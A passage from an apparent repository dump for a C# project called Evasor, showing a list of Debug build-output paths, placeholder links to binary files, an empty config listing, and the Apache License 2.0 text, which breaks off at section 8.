C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.Compression.dll 34 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.Compression.ZipFile.dll 35 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.dll 36 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.FileSystem.dll 37 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.FileSystem.DriveInfo.dll 38 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.FileSystem.Primitives.dll 39 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.FileSystem.Watcher.dll 40 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.IsolatedStorage.dll 41 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.MemoryMappedFiles.dll 42 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.Pipes.dll 43 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.UnmanagedMemoryStream.dll 44 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Linq.dll 45 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Linq.Expressions.dll 46 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Linq.Parallel.dll 47 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Linq.Queryable.dll 48 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.Http.dll 49 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.NameResolution.dll 50 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.NetworkInformation.dll 51 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.Ping.dll 52 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.Primitives.dll 53 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.Requests.dll 54 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.Security.dll 55 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.Sockets.dll 56 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.WebHeaderCollection.dll 57 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.WebSockets.Client.dll 58 | 
C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.WebSockets.dll 59 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.ObjectModel.dll 60 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Reflection.dll 61 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Reflection.Extensions.dll 62 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Reflection.Primitives.dll 63 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Resources.Reader.dll 64 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Resources.ResourceManager.dll 65 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Resources.Writer.dll 66 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.CompilerServices.VisualC.dll 67 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.dll 68 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Extensions.dll 69 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Handles.dll 70 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.InteropServices.dll 71 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.InteropServices.RuntimeInformation.dll 72 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Numerics.dll 73 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Serialization.Formatters.dll 74 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Serialization.Json.dll 75 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Serialization.Primitives.dll 76 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Serialization.Xml.dll 77 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Claims.dll 78 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Cryptography.Algorithms.dll 79 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Cryptography.Csp.dll 80 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Cryptography.Encoding.dll 81 | 
C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Cryptography.Primitives.dll 82 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Cryptography.X509Certificates.dll 83 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Principal.dll 84 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.SecureString.dll 85 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Text.Encoding.dll 86 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Text.Encoding.Extensions.dll 87 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Text.RegularExpressions.dll 88 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.dll 89 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.Overlapped.dll 90 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.Tasks.dll 91 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.Tasks.Parallel.dll 92 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.Thread.dll 93 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.ThreadPool.dll 94 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Threading.Timer.dll 95 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.ValueTuple.dll 96 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Xml.ReaderWriter.dll 97 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Xml.XDocument.dll 98 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Xml.XmlDocument.dll 99 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Xml.XmlSerializer.dll 100 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Xml.XPath.dll 101 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Xml.XPath.XDocument.dll 102 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\Newtonsoft.Json.dll 103 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Data.SQLite.dll 104 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Management.Automation.dll 105 | 
C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\Newtonsoft.Json.xml 106 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Data.SQLite.xml 107 | C:\Users\arik\Desktop\Evasor\Evasor\obj\Debug\Evasor.exe.config 108 | C:\Users\arik\Desktop\Evasor\Evasor\obj\Debug\Evasor.csproj.CopyComplete 109 | C:\Users\arik\Desktop\Evasor\Evasor\obj\Debug\Evasor.exe 110 | C:\Users\arik\Desktop\Evasor\Evasor\obj\Debug\Evasor.pdb 111 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\Evasor.exe.config 112 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\Evasor.exe 113 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\Evasor.pdb 114 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\Microsoft.Win32.Primitives.dll 115 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\netstandard.dll 116 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.AppContext.dll 117 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Collections.Concurrent.dll 118 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Collections.dll 119 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Collections.NonGeneric.dll 120 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Collections.Specialized.dll 121 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.ComponentModel.dll 122 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.ComponentModel.EventBasedAsync.dll 123 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.ComponentModel.Primitives.dll 124 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.ComponentModel.TypeConverter.dll 125 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Console.dll 126 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Data.Common.dll 127 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.Contracts.dll 128 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.Debug.dll 129 | 
C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.FileVersionInfo.dll 130 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.Process.dll 131 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.StackTrace.dll 132 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.TextWriterTraceListener.dll 133 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.Tools.dll 134 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.TraceSource.dll 135 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Diagnostics.Tracing.dll 136 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Drawing.Primitives.dll 137 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Dynamic.Runtime.dll 138 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Globalization.Calendars.dll 139 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Globalization.dll 140 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Globalization.Extensions.dll 141 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.Compression.dll 142 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.Compression.ZipFile.dll 143 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.dll 144 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.FileSystem.dll 145 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.FileSystem.DriveInfo.dll 146 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.FileSystem.Primitives.dll 147 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.FileSystem.Watcher.dll 148 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.IsolatedStorage.dll 149 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.MemoryMappedFiles.dll 150 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.Pipes.dll 151 | 
C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.IO.UnmanagedMemoryStream.dll 152 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Linq.dll 153 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Linq.Expressions.dll 154 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Linq.Parallel.dll 155 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Linq.Queryable.dll 156 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.Http.dll 157 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.NameResolution.dll 158 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.NetworkInformation.dll 159 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.Ping.dll 160 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.Primitives.dll 161 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.Requests.dll 162 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.Security.dll 163 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.Sockets.dll 164 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.WebHeaderCollection.dll 165 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.WebSockets.Client.dll 166 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Net.WebSockets.dll 167 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.ObjectModel.dll 168 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Reflection.dll 169 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Reflection.Extensions.dll 170 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Reflection.Primitives.dll 171 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Resources.Reader.dll 172 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Resources.ResourceManager.dll 173 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Resources.Writer.dll 174 | 
C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.CompilerServices.VisualC.dll 175 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.dll 176 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Extensions.dll 177 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Handles.dll 178 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.InteropServices.dll 179 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.InteropServices.RuntimeInformation.dll 180 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Numerics.dll 181 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Serialization.Formatters.dll 182 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Serialization.Json.dll 183 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Serialization.Primitives.dll 184 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Runtime.Serialization.Xml.dll 185 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Claims.dll 186 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Cryptography.Algorithms.dll 187 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Cryptography.Csp.dll 188 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Cryptography.Encoding.dll 189 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Cryptography.Primitives.dll 190 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Cryptography.X509Certificates.dll 191 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.Principal.dll 192 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Security.SecureString.dll 193 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Text.Encoding.dll 194 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Text.Encoding.Extensions.dll 195 | 
C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Text.RegularExpressions.dll 196 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.dll 197 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.Overlapped.dll 198 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.Tasks.dll 199 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.Tasks.Parallel.dll 200 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.Thread.dll 201 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.ThreadPool.dll 202 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Threading.Timer.dll 203 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.ValueTuple.dll 204 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Xml.ReaderWriter.dll 205 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Xml.XDocument.dll 206 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Xml.XmlDocument.dll 207 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Xml.XmlSerializer.dll 208 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Xml.XPath.dll 209 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Xml.XPath.XDocument.dll 210 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\Newtonsoft.Json.dll 211 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Data.SQLite.dll 212 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Management.Automation.dll 213 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\Newtonsoft.Json.xml 214 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\bin\Debug\System.Data.SQLite.xml 215 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\obj\Debug\Evasor.csprojAssemblyReference.cache 216 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\obj\Debug\Evasor.exe.config 217 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\obj\Debug\Evasor.csproj.CoreCompileInputs.cache 218 | 
C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\obj\Debug\Evasor.csproj.CopyComplete 219 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\obj\Debug\Evasor.exe 220 | C:\Users\arik\Desktop\Evasor-1.0.0\Evasor\obj\Debug\Evasor.pdb 221 | -------------------------------------------------------------------------------- /Evasor/obj/Debug/Evasor.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/Evasor.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Evasor/obj/Debug/Evasor.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 
221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | -------------------------------------------------------------------------------- /Evasor/obj/Debug/Evasor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/Evasor.pdb -------------------------------------------------------------------------------- /Evasor/obj/Debug/TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs -------------------------------------------------------------------------------- /Evasor/obj/Debug/TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs -------------------------------------------------------------------------------- /Evasor/obj/Debug/TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs -------------------------------------------------------------------------------- /Evasor_WCpOGoPmka.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor_WCpOGoPmka.png 
-------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 
39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. 
Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
